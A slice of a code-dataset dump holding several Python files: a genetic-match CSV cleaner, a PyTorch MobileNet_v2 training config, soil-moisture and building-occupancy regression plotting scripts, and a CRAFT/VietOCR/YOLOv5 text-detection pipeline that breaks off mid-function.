Create empty edges list\n edges = []\n # Open the file\n #with open(ffile, 'r', encoding=\"UTF8\") as infile:\n readedges = csv.reader(ffile)\n # Pump file contents into edges list\n for row in readedges:\n edges.append(row)\n # Read the column names from the first line of the file\n edgesHeader = edges[0]\n # Fix ID column header\n if edgesHeader[5] == \"Profile KitID\":\n edgesHeader[5] = edgesHeader[5].replace(\"Profile KitID\", \"Source\")\n print(\"Fixed Source Header\")\n else:\n print(\"Source Header OK\")\n # Fix Label column header\n if edgesHeader[6] == \"Match KitID\":\n edgesHeader[6] = edgesHeader[6].replace(\"Match KitID\", \"Target\")\n print(\"Fixed Target Header\")\n else:\n print(\"Target Header OK\")\n # Pop off first row (the headers)\n edges.pop(0)\n # Now we have Headers and nodes objects\n\n # Build edgeFile\n #workPath = os.path(file_directory)\n edgeFile = str(file_directory + '/edges.csv')\n # If edges.csv exists, delete it\n if os.path.isfile(edgeFile):\n try:\n os.unlink(edgeFile)\n print(\"Removed previous edges.csv file.\")\n except:\n print(\"No previous edges.csv file found.\")\n # Write the Header and nodes to file\n with open(edgeFile, 'w', encoding=\"UTF8\", newline='') as outfile:\n writeedges = csv.writer(outfile)\n writeedges.writerow([edgesHeader[5], edgesHeader[6]])\n for row in edges:\n writeedges.writerow([row[5], row[6]])\n print(\"Created edges.csv file\")\n\n\nprint(\"Let's clean some data!\")\nuserInput = input(\"Make data anonymized? (y/n) \")\nprint(\"What directory holds your files?\")\nfile_directory = which_directory()\nprint(\"We'll start with Family Finder Match data.\")\nmakeNodes(userInput)\nprint(\"Great! Now let's prep the ICW data\")\nmakeEdges()\nprint(\"OK. That should do it.\")\n","sub_path":"cleanFTDNA.py","file_name":"cleanFTDNA.py","file_ext":"py","file_size_in_byte":6877,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"301809410","text":"import torch\nimport torch.nn.functional as F\nimport numpy as np\nfrom collections import OrderedDict\nfrom easydict import EasyDict\nfrom _main_base import main\nimport os\n\n#---\n# config\n#---\ncfg = EasyDict()\n\n# class\ncfg.CLASS_LABEL = ['akahara', 'madara']\ncfg.CLASS_NUM = len(cfg.CLASS_LABEL)\n\n# model\ncfg.INPUT_HEIGHT = 64\ncfg.INPUT_WIDTH = 64\ncfg.INPUT_CHANNEL = 3\n\ncfg.GPU = False\ncfg.DEVICE = torch.device(\"cuda\" if cfg.GPU and torch.cuda.is_available() else \"cpu\")\n\ncfg.MODEL_SAVE_PATH = 'models/MobileNet_v2_{}.pt'\ncfg.MODEL_SAVE_INTERVAL = 200\ncfg.ITERATION = 1000\ncfg.MINIBATCH = 8\ncfg.OPTIMIZER = torch.optim.SGD\ncfg.LEARNING_RATE = 0.01\ncfg.MOMENTUM = 0.9\ncfg.LOSS_FUNCTION = loss_fn = torch.nn.NLLLoss()\n\ncfg.TRAIN = EasyDict()\ncfg.TRAIN.DISPAY_ITERATION_INTERVAL = 50\n\ncfg.TRAIN.DATA_PATH = '../Dataset/train/images/'\ncfg.TRAIN.DATA_HORIZONTAL_FLIP = True\ncfg.TRAIN.DATA_VERTICAL_FLIP = True\ncfg.TRAIN.DATA_ROTATION = False\n\ncfg.TEST = EasyDict()\ncfg.TEST.MODEL_PATH = cfg.MODEL_SAVE_PATH.format('final')\ncfg.TEST.DATA_PATH = '../Dataset/test/images/'\ncfg.TEST.MINIBATCH = 2\n\n# random seed\ntorch.manual_seed(0)\n\n\nclass MobileNet_v2(torch.nn.Module): \n def __init__(self):\n super(MobileNet_v2, self).__init__()\n \n # define block\n class MobileNetBlock(torch.nn.Module):\n def __init__(self, in_dim, out_dim, stride=1, expansion_t=6, split_division_by=8):\n super(MobileNetBlock, self).__init__()\n \n self.module = torch.nn.Sequential(\n torch.nn.Conv2d(in_dim, in_dim * expansion_t, kernel_size=1, padding=0, stride=1, groups=in_dim),\n torch.nn.BatchNorm2d(in_dim * expansion_t),\n torch.nn.ReLU6(),\n torch.nn.Conv2d(in_dim * expansion_t, in_dim * expansion_t, kernel_size=3, padding=1, stride=stride, groups=split_division_by),\n torch.nn.BatchNorm2d(in_dim * expansion_t),\n torch.nn.ReLU6(),\n torch.nn.Conv2d(in_dim * expansion_t, out_dim, kernel_size=1, padding=0, stride=1),\n torch.nn.BatchNorm2d(out_dim),\n )\n \n def forward(self, _input):\n x = self.module(_input)\n \n # if shape matches, add skip connection\n if x.size() == _input.size():\n x = x + _input\n \n return x\n \n # define feature dimension flattening layer\n class Flatten(torch.nn.Module):\n def forward(self, x):\n x = x.view(x.size()[0], -1)\n return x\n \n self.module = torch.nn.Sequential(\n # input\n # 224 x 224 x 3\n torch.nn.Conv2d(cfg.INPUT_CHANNEL, 32, kernel_size=3, padding=1, stride=2),\n torch.nn.BatchNorm2d(32),\n torch.nn.ReLU6(),\n # 112 x 112 x 32\n MobileNetBlock(32, 16, expansion_t=1),\n # 112 x 112 x 16\n MobileNetBlock(16, 24, stride=2),\n MobileNetBlock(24, 24),\n # 56 x 56 x 24\n MobileNetBlock(24, 32, stride=2),\n MobileNetBlock(32, 32),\n MobileNetBlock(32, 32),\n # 28 x 28 x 32\n MobileNetBlock(32, 64, stride=2),\n MobileNetBlock(64, 64),\n MobileNetBlock(64, 64),\n MobileNetBlock(64, 64),\n # 14 x 14 x 64\n MobileNetBlock(64, 96),\n MobileNetBlock(96, 96),\n MobileNetBlock(96, 96),\n # 14 x 14 x 96\n MobileNetBlock(96, 160, stride=2),\n MobileNetBlock(160, 160),\n MobileNetBlock(160, 160),\n # 7 x 7 x 160\n MobileNetBlock(160, 320),\n # 7 x 7 x 320\n torch.nn.Conv2d(320, 1280, kernel_size=1, padding=0, stride=1),\n torch.nn.BatchNorm2d(1280),\n torch.nn.ReLU6(),\n # 7 x 7 x 1280\n torch.nn.AdaptiveAvgPool2d([1, 1]),\n Flatten(),\n # 1 x 1 x 1280\n torch.nn.Linear(1280, cfg.CLASS_NUM),\n torch.nn.Softmax(dim=1)\n )\n\n \n def forward(self, x):\n x = self.module(x)\n return x\n\n# main\nif __name__ == '__main__':\n\n model_save_dir = '/'.join(cfg.MODEL_SAVE_PATH.split('/')[:-1])\n os.makedirs(model_save_dir, exist_ok=True)\n\n main(cfg, MobileNet_v2())","sub_path":"Scripts_Model/scripts_pytorch/MobileNet_v2_pytorch.py","file_name":"MobileNet_v2_pytorch.py","file_ext":"py","file_size_in_byte":4449,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"504679872","text":"#!/gpfsm/dulocal/sles11/other/SLES11.3/miniconda3/2019.03_py3.7/2019-05-15/bin/python\n\nimport numpy as np\nimport csv\nimport sys\nimport datetime as dt\nimport matplotlib\nmatplotlib.use('TkAgg')\nimport matplotlib.pyplot as plt\n\n######### Set up some lists for the data ################\nx = []\nObservedSM = []\nnoahSM = []\nNoahGPR = []\np = []\niSSE = []\n\n######## import all the data ########################3## \nwith open('site.txt', 'r') as siteFile:\n site = str(siteFile.read())\nwith open('output.gpr', 'r') as gprFile:\n gprData = csv.reader(gprFile, delimiter=' ', skipinitialspace=True)\n for gprRow in gprData:\n NoahGPR.append(float(gprRow[10]))\n NoahGPR = np.array(NoahGPR)\nwith open('obs.txt', 'r') as obsFile:\n obsData = csv.reader(obsFile, delimiter=' ', skipinitialspace=True)\n for obsRow in obsData:\n ObservedSM.append(float(obsRow[5]))\n ObservedSM = np.array(ObservedSM)\nwith open('output.noah', 'r') as oFile:\n fData = csv.reader(oFile, delimiter=' ', skipinitialspace=True )\n for row in fData:\n D = dt.datetime(int(row[0]),1,1) + \\\n dt.timedelta((int(row[1])-1) + float(row[2])/24)\n x.append(D)\n p.append(float(row[9]))\n noahSM.append(float(row[10]))\n noahSM = np.array(noahSM)\n x = np.array(x)\n\nfor t in range(ObservedSM.shape[0]):\n if ObservedSM[t] > 0:\n iSSE.append(t)\n\n################# Calculate some statistics #### \n# Mean divergence\nMD = np.sum((np.mean(ObservedSM[iSSE]) - ObservedSM[iSSE])**2)\n#Sum of squared error\nSSE_noah_only = np.sum((ObservedSM[iSSE] - noahSM[iSSE])**2)\nSSE_noah_gpr = np.sum((ObservedSM[iSSE] - NoahGPR[iSSE])**2)\n#Nash sutcliffe efficiency\nNS_noah_gpr = 1 - (SSE_noah_gpr/MD)\nNS_noah_only = 1 - (SSE_noah_only/MD)\nprint('The Nash-Sutcliffe Efficiency is')\nprint('For Noah alone: ', str(NS_noah_only))\nprint('For Noah with GPR: ', str(NS_noah_gpr))\n# Root Mean Square Error\na = 0\nb = ObservedSM.shape[0]\nprint('The RMSE is')\nprint('For Noah alone: ', str(np.sqrt(SSE_noah_only/len(iSSE))))\nprint('For Noah with GPR: ', str(np.sqrt(SSE_noah_gpr/len(iSSE))))\n\n# Start plot\nsp = int(input('what day of the record to start the plot? I recommend 0\\n'))*48\n# end plot\nprint('The total number of days in the output file is: ', str(int(np.floor(len(x)/48))))\nprint('What dey of record do you want to end want to plot?') \nep = int(input('It needs to be greater than when it started\\n'))*48\nep = int(max(sp+48,np.floor(ep)))\n\nprint('plotting')\nfig, ax1 = plt.subplots(figsize=(15,10))\nax1.plot(x[sp:ep],ObservedSM[sp:ep], label='Observed soil moisture', color='k', linewidth=0.5)\nax1.plot(x[sp:ep],noahSM[sp:ep], label='Noah prediction', color='b', linewidth=0.5)\nax1.plot(x[sp:ep],NoahGPR[sp:ep], '--', label='NoahMP with GPR prediction', color='r', linewidth=1.0)\nax1.set_ylabel('Soil moisture')\nax1.set_ylim([0,np.max(ObservedSM[sp:ep])])\nplt.legend(loc='upper left')\nax2 = ax1.twinx()\nax2.plot(x[sp:ep],p[sp:ep], label='precipitation', linewidth=0.1, color='grey')\nax2.set_ylabel('precip')\nplt.title(\"Site \"+site)\nplt.legend(loc='upper right')\nfig.tight_layout() # otherwise the right y-label is slightly clipped\nplt.show()\n","sub_path":"setup_dir/gpr/plot_gprNoah_output_print_results.py","file_name":"plot_gprNoah_output_print_results.py","file_ext":"py","file_size_in_byte":3167,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"236194083","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Jun 8 15:10:13 2021\r\n\r\n@author: Felix\r\n\"\"\"\r\nimport pandas as pd\r\nimport numpy as np\r\nimport matplotlib as mpl\r\nimport matplotlib.pyplot as plt\r\nimport seaborn as sns\r\nimport sklearn\r\nfrom sklearn import neighbors\r\nfrom sklearn.model_selection import train_test_split\r\nfrom sklearn import preprocessing\r\nfrom sklearn.model_selection import GridSearchCV\r\nimport tensorflow as tf\r\nfrom tensorflow import keras\r\nfrom keras.models import Sequential\r\nfrom keras.wrappers.scikit_learn import KerasClassifier\r\nfrom mpl_toolkits.mplot3d import Axes3D\r\nfrom tensorflow.keras.layers import Dropout, Dense\r\nfrom datetime import datetime\r\nfrom sklearn.gaussian_process.kernels \\\r\nimport RBF, WhiteKernel, RationalQuadratic, ExpSineSquared\r\nfrom sklearn.gaussian_process.kernels import ConstantKernel as C\r\n\r\nfrom sklearn.gaussian_process import GaussianProcessRegressor\r\n\r\n\r\n\r\ndf_building = pd.read_excel('Clean_Set.xlsx',sheet_name = None)\r\n\r\ndf_building_clean = {}\r\nfor k1 in df_building.keys():\r\n df_building_clean[k1] = df_building.get(k1).drop('Unnamed: 0',axis=1)\r\n \r\n \r\nFloor1S_heads = list(df_building_clean.get('Floor1S').columns)\r\nFloor1W_heads = list(df_building_clean.get('Floor1W').columns)\r\nFloor2S_heads = list(df_building_clean.get('Floor2S').columns)\r\nFloor2W_heads = list(df_building_clean.get('Floor2W').columns)\r\nFloor3_heads = list(df_building_clean.get('Floor3').columns)\r\nFloor4_heads = list(df_building_clean.get('Floor4').columns)\r\n\r\nTime_2W = df_building_clean.get('Floor1S')[['Time']]\r\n\r\n\r\n\r\nX = df_building_clean.get('Floor1S')[['AP_Total']].values\r\nX = (np.atleast_2d(X))\r\n\r\ny = df_building_clean.get('Floor1S')[['Groundtruth']].iloc[:,0].values\r\ny = y.reshape(-1,1)\r\nx = (np.atleast_2d(np.linspace(1,100,287))).T\r\n\r\nX2 = df_building_clean.get('Floor1W')[['AP_Total']].values\r\nX2 = (np.atleast_2d(X2))\r\ny2 = df_building_clean.get('Floor1W')[['Groundtruth']].iloc[:,0].values\r\ny2 = y2.reshape(-1,1)\r\nx2 = (np.atleast_2d(np.linspace(1,100,127))).T\r\n\r\n\r\n# Kernel with parameters given in GPML book\r\nk1 = 30.0**2 * RBF(length_scale=35) # long term smooth rising trend\r\n\r\nk4 = 4**2 * RBF(length_scale=1) \\\r\n + WhiteKernel(noise_level=5**2) # noise terms\r\nkernel = k1 + k4\r\n\r\ngp = GaussianProcessRegressor(kernel=kernel,optimizer='fmin_l_bfgs_b', n_restarts_optimizer=20,normalize_y=True)\r\ngp.fit(X,y)\r\n\r\nprint(\"\\nLearned kernel: %s\" % gp.kernel_)\r\nprint(\"Log-marginal-likelihood: %.3f\"\r\n % gp.log_marginal_likelihood(gp.kernel_.theta))\r\n\r\nX_ = np.linspace(X.min(), X.max() + 30, 1000)[:, np.newaxis]\r\ny_pred, y_std = gp.predict(X_, return_std=True)\r\n\r\n\r\n\r\nplt.figure(figsize=(10,7))\r\nplt.scatter(X, y, c='k',label='Data points')\r\nplt.plot(X_, y_pred, 'g',label='Mean of predictive distribution')\r\n\r\n\r\n\r\ny_pred = np.reshape(y_pred,-1)\r\nplt.fill_between(X_[:, 0], (y_pred - y_std), (y_pred + y_std),\r\n alpha=0.5, color='b',label='Standard deviation of predictive distribution')\r\n\r\nplt.xlim(X_.min(), X_.max())\r\n\r\nplt.xlabel(\"AP_Total\")\r\nplt.ylabel(r\"Occupancy count\")\r\nplt.title(r\"Gaussian process, 1st-Floor\")\r\nplt.legend(loc='lower center')\r\nplt.show()\r\n\r\ny_pred2, sigma = gp.predict(X, return_std=True)\r\n\r\nw_2 = sklearn.metrics.r2_score(y_pred2, y)\r\n\r\nplt.figure(figsize=(12,5))\r\nplt.title('Model_gauss 1st-FloorS vs. Data 1st-FloorS, [R_2:%s] ' %w_2, fontsize=15, color= 'black', y= 1.1)\r\nplt.plot(x, y_pred2,'bo',markersize=5,label='Prediction')\r\nplt.plot(x, y,'ro',markersize=5,label='Groundtruth')\r\nplt.legend(loc='upper center')\r\nplt.xlabel('Time_steps')\r\nplt.ylabel('Occupancy-count')\r\nplt.grid(True)\r\n\r\n\r\n\r\n\r\ny_pred3, sigma2 = gp.predict(X2, return_std=True)\r\n\r\nw_2 = sklearn.metrics.r2_score(y_pred3, y2)\r\n\r\n\r\n\r\nplt.figure(figsize=(12,5))\r\nplt.title('Model_gauss 1st-FloorS vs. Data 1st-FloorW, [R_2:%s] ' %w_2, fontsize=15, color= 'black', y= 1.1)\r\nplt.plot(x2, y_pred3,'bo',markersize=5,label='Prediction')\r\nplt.plot(x2, y2,'ro',markersize=5,label='Groundtruth')\r\nplt.legend(loc='upper center')\r\nplt.xlabel('Time_steps')\r\nplt.ylabel('Occupancy-count')\r\nplt.grid(True)","sub_path":"Gauß/1st_Floor_plots/Gauß_1stF.py","file_name":"Gauß_1stF.py","file_ext":"py","file_size_in_byte":4071,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"579076557","text":"import sys\nsys.path.append('./CRAFTpytorch/')\n# sys.path.append('./CRAFTpytorch/test.py')\nimport os\nimport time\nimport argparse\nimport gradio as gr\nimport json\n\nimport torch\nimport math\nimport torch.nn as nn\nimport torch.backends.cudnn as cudnn\nfrom torch.autograd import Variable\nfrom PIL import ImageFont, ImageDraw, Image\n\nimport cv2\nfrom skimage import io\nimport numpy as np\nimport craft_utils\n# import test\nimport imgproc\nimport file_utils\nimport json\nimport zipfile\nimport pandas as pd\nimport CRAFTpytorch.test as test\n# import test\n\nfrom CRAFTpytorch.test import copyStateDict\n# from test import copyStateDict\nfrom craft import CRAFT\n\nfrom collections import OrderedDict\n\nfrom pathlib import Path\nfrom numpy import random\nsys.path.append('./yolov5/')\nfrom models.experimental import attempt_load\nfrom utils.datasets import LoadStreams, LoadImages\nfrom utils.general import check_img_size, check_requirements, check_imshow, non_max_suppression, apply_classifier, \\\n scale_coords, xyxy2xywh, strip_optimizer, set_logging, increment_path\nfrom utils.plots import plot_one_box\nfrom utils.torch_utils import select_device, load_classifier, time_synchronized\n# DETECTION _____________________________________________________\ndef load_detection_model():\n parser = argparse.ArgumentParser(description='CRAFT Text Detection')\n parser.add_argument('--trained_model', default='weights/craft_mlt_25k.pth', type=str, help='pretrained model')\n parser.add_argument('--text_threshold', default=0.7, type=float, help='text confidence threshold')\n parser.add_argument('--low_text', default=0.4, type=float, help='text low-bound score')\n parser.add_argument('--link_threshold', default=0.4, type=float, help='link confidence threshold')\n parser.add_argument('--cuda', default=True, type=str2bool, help='Use cuda for inference')\n parser.add_argument('--canvas_size', default=1280, type=int, help='image size for inference')\n parser.add_argument('--mag_ratio', default=1.5, type=float, help='image magnification ratio')\n parser.add_argument('--poly', default=False, action='store_true', help='enable polygon type')\n parser.add_argument('--show_time', default=False, action='store_true', help='show processing time')\n parser.add_argument('--test_folder', default='/data/', type=str, help='folder path to input images')\n parser.add_argument('--refine', default=False, action='store_true', help='enable link refiner')\n parser.add_argument('--refiner_model', default='weights/craft_refiner_CTW1500.pth', type=str, help='pretrained refiner model')\n # args = parser.parse_args([\"--trained_model=/content/CRAFTpytorch/basenet/craft_mlt_25k.pth\",\"--test_folder=\"+impath,\"--refine\", \"--refiner_model=/content/CRAFTpytorch/basenet/craft_refiner_CTW1500.pth\"])\n args = parser.parse_args([\"--trained_model=./CRAFTpytorch/basenet/craft_mlt_25k.pth\",\"--refine\", \"--refiner_model=./CRAFTpytorch/basenet/craft_refiner_CTW1500.pth\"])\n net = CRAFT() # initialize\n print('Loading weights from checkpoint (' + args.trained_model + ')')\n if args.cuda:\n net.load_state_dict(copyStateDict(torch.load(args.trained_model)))\n else:\n net.load_state_dict(copyStateDict(torch.load(args.trained_model, map_location='cpu')))\n\n if args.cuda:\n net = net.cuda()\n net = torch.nn.DataParallel(net)\n cudnn.benchmark = False\n\n net.eval()\n\n # LinkRefiner\n refine_net = None\n if args.refine:\n from refinenet import RefineNet\n refine_net = RefineNet()\n print('Loading weights of refiner from checkpoint (' + args.refiner_model + ')')\n if args.cuda:\n refine_net.load_state_dict(copyStateDict(torch.load(args.refiner_model)))\n refine_net = refine_net.cuda()\n refine_net = torch.nn.DataParallel(refine_net)\n else:\n refine_net.load_state_dict(copyStateDict(torch.load(args.refiner_model, map_location='cpu')))\n\n refine_net.eval()\n # args.poly = True\n return net,refine_net,args\n\n\ndef str2bool(v):\n return v.lower() in (\"yes\", \"y\", \"true\", \"t\", \"1\")\ndef infer_detection(image,image_name,net,refine_net,args):\n #CRAFT\n data={}\n t = time.time()\n\n # load data\n # image = imgproc.loadImage(image_path)\n # image_name=int(os.path.relpath(image_path, start).replace('.jpg',''))\n bboxes, polys, score_text, det_scores = test.test_net(net, image, args.text_threshold, args.link_threshold, args.low_text, args.cuda, args.poly, args, refine_net)\n bbox_score={}\n index=0\n for box,conf in zip(bboxes,det_scores):\n bbox_score[str(index)]={}\n bbox_score[str(index)]['detconf']=str(conf)\n bbox_score[str(index)]['box']=[]\n for coors in box:\n temp=[str(coors[0]),str(coors[1])]\n bbox_score[str(index)]['box'].append(temp)\n index+=1\n data[image_name]=bbox_score\n if not os.path.isdir('./Results'):\n os.mkdir('./Results')\n # data.to_csv('./Results_csv/data.csv', sep = ',', na_rep='Unknown')\n # print(data)\n with open('./Results/data.json', 'w') as jsonfile:\n json.dump(data, jsonfile,sort_keys=True)\n jsonfile.close()\n print(\"elapsed time : {}s\".format(time.time() - t))\n\n\n# RECOGNITION__________________________\nfrom google.colab.patches import cv2_imshow\nimport matplotlib.pyplot as plt\nfrom PIL import Image\n\nfrom vietocr.tool.predictor import Predictor\nfrom vietocr.tool.config import Cfg\ndef load_recognition_model():\n #chuan bi ocr predict model\n config = Cfg.load_config_from_name('vgg_seq2seq')\n config['cnn']['pretrained']=False\n config['device'] = 'cuda:0'\n config['predictor']['beamsearch']=False\n recognizer = Predictor(config)\n return recognizer\n\nimport shutil\ndef crop(pts, image):\n\n \"\"\"\n Takes inputs as 8 points\n and Returns cropped, masked image with a white background\n \"\"\"\n for i in pts:\n if (i[0]<0):\n i[0]=0\n if(i[1]<0):\n i[1]=0\n rect = cv2.boundingRect(pts)\n x,y,w,h = rect\n #print('x,y,w,h:',x,y,w,h)\n #print(image)\n cropped = image[y:y+h, x:x+w].copy()\n pts = pts - pts.min(axis=0)\n mask = np.zeros(cropped.shape[:2], np.uint8)\n cv2.drawContours(mask, [pts], -1, (255, 255, 255), -1, cv2.LINE_AA)\n dst = cv2.bitwise_and(cropped, cropped, mask=mask)\n bg = np.ones_like(cropped, np.uint8)*255\n cv2.bitwise_not(bg,bg, mask=mask)\n dst2 = bg + dst\n\n return dst2\ndef generate_words(image_name, score_bbox, image,recognizer,tsvdata):\n\n #score_bbox: {'0': {'detconf': '0.886273', 'box': [['604.8', '116.8'], ['737.6', '116.8'], ['737.6', '209.6'],...\n num_bboxes = len(score_bbox)\n\n for num in range(num_bboxes): #duyet qua moi bbox trong 1 image\n bbox_coords = score_bbox[str(num)]['box']\n if(bbox_coords):\n l_t = float(bbox_coords[0][0])\n t_l = float(bbox_coords[0][1])\n r_t = float(bbox_coords[1][0])\n t_r = float(bbox_coords[1][1])\n r_b = float(bbox_coords[2][0])\n b_r = float(bbox_coords[2][1])\n l_b = float(bbox_coords[3][0])\n b_l = float(bbox_coords[3][1])\n pts = np.array([[int(l_t), int(t_l)], [int(r_t) ,int(t_r)], [int(r_b) , int(b_r)], [int(l_b), int(b_l)]])\n #print('pts:',pts)\n if np.all(pts) > 0:\n # break\n word = crop(pts, image)\n img=Image.fromarray(word)\n trans=recognizer.predict(img)\n # print(str(num),':',trans, type(trans))\n coords=tsvdata[image_name][str(num)]['box']\n coords=[\"1\",coords[0][0],coords[0][1],coords[1][0],coords[1][1],coords[2][0],coords[2][1],coords[3][0],coords[3][1]]\n tsvdata[image_name][str(num)]['trans']=trans\n # folder = '/'.join( image_name.split('/')[:-1])\n # folder=image_name\n\n\n # #CHANGE DIR\n # if not os.path.isdir('./cropped_words'):\n # os.mkdir('./cropped_words')\n # dir = './cropped_words/'\n\n # if not os.path.isdir(os.path.join(dir + folder)):\n # os.mkdir(os.path.join(dir + folder))\n # dir=dir+folder+'/'\n\n # try:\n # # print(image_name)\n # file_name = os.path.join(dir + image_name+'_'+str(num))\n # # cv2.imwrite(file_name+'_{}_{}_{}_{}_{}_{}_{}_{}.jpg'.format(l_t, t_l, r_t ,t_r, r_b , b_r ,l_b, b_l), word)\n # cv2.imwrite(file_name+'.jpg',word)\n # #print('Image saved to '+file_name+'_{}_{}_{}_{}_{}_{}_{}_{}.jpg'.format(l_t, t_l, r_t ,t_r, r_b , b_r ,l_b, b_l))\n # except:\n # continue\n\n\ndef crop_OCR(recognizer, image,image_name):\n data=json.load(open('./Results/data.json')) #PATH TO CSV\n # print(data)\n\n # start = './frames' #PATH TO TEST IMAGES\n\n # for image_name in data:\n #print(str(os.path.join(start, data['image_name'][image_num])))\n # image = cv2.imread(os.path.join(start,image_name+'.jpg'))\n score_bbox = data[image_name]\n generate_words(image_name, score_bbox, image,recognizer,data)\n with open('./Results/data.json', 'w') as jsonfile:\n json.dump(data, jsonfile)\n jsonfile.close()\n # shutil.rmtree(start)\n\n\n# yolo_________________________\ndef load_yolo():\n parser = argparse.ArgumentParser()\n parser.add_argument('--weights', nargs='+', type=str, default='yolov5s.pt', help='model.pt path(s)')\n parser.add_argument('--source', type=str, default='data/images', help='source') # file/folder, 0 for webcam\n parser.add_argument('--img-size', type=int, default=640, help='inference size (pixels)')\n parser.add_argument('--conf-thres', type=float, default=0.25, help='object confidence threshold')\n parser.add_argument('--iou-thres', type=float, default=0.45, help='IOU threshold for NMS')\n parser.add_argument('--device', default='', help='cuda device, i.e. 0 or 0,1,2,3 or cpu')\n parser.add_argument('--view-img', action='store_true', help='display results')\n parser.add_argument('--save-txt', action='store_true', help='save results to *.txt')\n parser.add_argument('--save-conf', action='store_true', help='save confidences in --save-txt labels')\n parser.add_argument('--nosave', action='store_true', help='do not save images/videos')\n parser.add_argument('--classes', nargs='+', type=int, help='filter by class: --class 0, or --class 0 2 3')\n parser.add_argument('--agnostic-nms', action='store_true', help='class-agnostic NMS')\n parser.add_argument('--augment', action='store_true', help='augmented inference')\n parser.add_argument('--update', action='store_true', help='update all models')\n parser.add_argument('--project', default='runs/detect', help='save results to project/name')\n parser.add_argument('--name', default='exp', help='save results to project/name')\n parser.add_argument('--exist-ok', action='store_true', help='existing project/name ok, do not increment')\n # opt = parser.parse_args()\n opt = parser.parse_args([\"--weights=./yolov5/runs/train/best.pt\",\"--img=320\", \"--conf=0.5\",\"--save-txt\",\"--exist-ok\"])\n check_requirements(exclude=('pycocotools', 'thop'))\n print(opt)\n check_requirements(exclude=('pycocotools', 'thop'))\n weights, view_img, save_txt, imgsz = opt.weights, opt.view_img, opt.save_txt, opt.img_size\n\n # Initialize\n set_logging()\n device = select_device(opt.device)\n half = device.type != 'cpu' # half precision only supported on CUDA\n\n # Load model\n model = attempt_load(weights, map_location=device) # load FP32 model\n stride = int(model.stride.max()) # model stride\n imgsz = check_img_size(imgsz, s=stride) # check img_size\n if half:\n model.half() # to FP16\n if device.type != 'cpu':\n model(torch.zeros(1, 3, imgsz, imgsz).to(device).type_as(next(model.parameters()))) # run once\n return opt,model,stride\n\n\ndef detect(opt,model,stride,save_img=False):\n source, weights, view_img, save_txt, imgsz = opt.source, opt.weights, opt.view_img, opt.save_txt, opt.img_size\n save_img = not opt.nosave and not source.endswith('.txt') # save inference images\n webcam = source.isnumeric() or source.endswith('.txt') or source.lower().startswith(\n ('rtsp://', 'rtmp://', 'http://', 'https://'))\n\n # Directories\n save_dir = Path(increment_path(Path(opt.project) / opt.name, exist_ok=opt.exist_ok)) # increment run\n (save_dir / 'labels' if save_txt else save_dir).mkdir(parents=True, exist_ok=True) # make dir\n\n # Initialize\n device = select_device(opt.device)\n half = device.type != 'cpu' # half precision only supported on CUDA\n # Set Dataloader\n vid_path, vid_writer = None, None\n dataset = LoadImages(source, img_size=imgsz, stride=stride)\n\n # Get names and colors\n names = model.module.names if hasattr(model, 'module') else model.names\n colors = [[random.randint(0, 255) for _ in range(3)] for _ in names]\n\n # Run inference\n t0 = time.time()\n for path, img, im0s, vid_cap in dataset:\n img = torch.from_numpy(img).to(device)\n img = img.half() if half else img.float() # uint8 to fp16/32\n img /= 255.0 # 0 - 255 to 0.0 - 1.0\n if img.ndimension() == 3:\n img = img.unsqueeze(0)\n\n # Inference\n t1 = time_synchronized()\n pred = model(img, augment=opt.augment)[0]\n\n # Apply NMS\n pred = non_max_suppression(pred, opt.conf_thres, opt.iou_thres, classes=opt.classes, agnostic=opt.agnostic_nms)\n t2 = time_synchronized()\n\n # Apply Classifier\n # if classify:\n # pred = apply_classifier(pred, modelc, img, im0s)\n\n # Process detections\n for i, det in enumerate(pred): # detections per image\n p, s, im0, frame = path, '', im0s, getattr(dataset, 'frame', 0)\n\n p = Path(p) # to Path\n save_path = str(save_dir / p.name) # img.jpg\n txt_path = str(save_dir / 'labels' / p.stem) + ('' if dataset.mode == 'image' else f'_{frame}') # img.txt\n s += '%gx%g ' % img.shape[2:] # print string\n gn = torch.tensor(im0.shape)[[1, 0, 1, 0]] # normalization gain whwh\n if len(det):\n # Rescale boxes from img_size to im0 size\n det[:, :4] = scale_coords(img.shape[2:], det[:, :4], im0.shape).round()\n\n # Print results\n for c in det[:, -1].unique():\n n = (det[:, -1] == c).sum() # detections per class\n s += f\"{n} {names[int(c)]}{'s' * (n > 1)}, \" # add to string\n\n # Write results\n for *xyxy, conf, cls in reversed(det):\n if save_txt: # Write to file\n xywh = (xyxy2xywh(torch.tensor(xyxy).view(1, 4)) / gn).view(-1).tolist() # normalized xywh\n line = (cls, int(xyxy[0]), int(xyxy[1]), int(xyxy[2]), int(xyxy[3]), conf) if opt.save_conf else (cls, int(xyxy[0]), int(xyxy[1]), int(xyxy[2]), int(xyxy[3])) # label format\n # print(line)\n with open(txt_path + '.txt', 'a') as f:\n f.write(('%g ' * len(line)).rstrip() % line + '\\n')\n\n if save_img or view_img: # Add bbox to image\n label = f'{names[int(cls)]} {conf:.2f}'\n plot_one_box(xyxy, im0, label=label, color=colors[int(cls)], line_thickness=3)\n\n # Print time (inference + NMS)\n # print(f'{s}Done. ({t2 - t1:.3f}s)')\n\n # Stream results\n if view_img:\n cv2.imshow(str(p), im0)\n cv2.waitKey(1) # 1 millisecond\n\n # Save results (image with detections)\n if save_img:\n if dataset.mode == 'image':\n cv2.imwrite(save_path, im0)\n else: # 'video' or 'stream'\n if vid_path != save_path: # new video\n vid_path = save_path\n if isinstance(vid_writer, cv2.VideoWriter):\n vid_writer.release() # release previous video writer\n if vid_cap: # video\n fps = vid_cap.get(cv2.CAP_PROP_FPS)\n w = int(vid_cap.get(cv2.CAP_PROP_FRAME_WIDTH))\n h = int(vid_cap.get(cv2.CAP_PROP_FRAME_HEIGHT))\n else: # stream\n fps, w, h = 30, im0.shape[1], im0.shape[0]\n save_path += '.mp4'\n vid_writer = cv2.VideoWriter(save_path, cv2.VideoWriter_fourcc(*'mp4v'), fps, (w, h))\n vid_writer.write(im0)\n\n if save_txt or save_img:\n s = f\"\\n{len(list(save_dir.glob('labels/*.txt')))} labels saved to {save_dir / 'labels'}\" if save_txt else ''\n # print(f\"Results saved to {save_dir}{s}\")\n\n # print(f'Done. ({time.time() - 